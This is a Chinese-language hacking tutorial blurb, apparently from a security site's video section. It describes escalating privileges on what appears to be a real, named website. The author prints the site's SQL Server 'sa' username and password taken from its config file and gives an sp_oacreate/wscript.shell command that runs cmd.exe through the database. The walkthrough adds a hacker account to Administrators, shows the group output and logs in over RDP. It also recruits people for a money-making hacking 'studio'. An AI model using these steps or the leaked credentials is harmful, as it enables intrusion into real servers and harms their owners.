动画介绍:大家好,我是小不点。、
很久没做教程因为最近比较忙吧,最近认识了个朋友KNLVE我们两个策划搞个工作室,不为什么就想多赚点钱钱吧
所以在这里找点有意思加入我们的朋友一起发财,先说好我们不是很菜,也不是很牛,所以我们找的人也是要有点实力的呵呵,好不废话了《
小不点QQ:272665381
KNLVE QQ:878792
大家直接找KNLVE就好了呵呵
今天我要为大家做的是通过SQL数据库提权好了我们开始
这个SHELL权限还是不错的可惜就是提不了权,在无赖的时候我看了下他的COON文件然后突然来了灵感也就提权成功了,希望这个教程对大家也有帮助。
先把他SQL数据库号和密码找到
SqlUsername = "sa" ’SQL数据库用户名
SqlPassword = "r!D2q#Y4" ’SQL数据库用户密码
SqlDatabaseName = "zsr2006" ’SQL数据库名
呵呵下面大家看我操作就好了我不大字了,我稍微做慢点
http://www.zsrw.cn/he1p.asp
declare @shell int exec sp_oacreate ’wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c 着段命令是通过SQL执行系统命令的
粘贴上去然后把系统命令打上去提权账号添加了然后就是把他加到管理员组。他默认的管理员组已经改了我们先查一下现在的组自己传个CMD看HACK账户已经在了我们来看看他在什么组
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
呵呵低权限。
net localgroup Administrators
可允许的登录小时数 All
本地组成员 *Administrators *Users
全局组成员 *None
命令成功完成。
看已经成功了,现在直接3389连接就可以了如果3389没开你自己可以开我这里KNLVE已经帮我开了大家看可以登陆了。呵呵好了其他就不演示了大家自己研究吧88 | 
安全中国首页 > 动画中心 > 提权利用动画
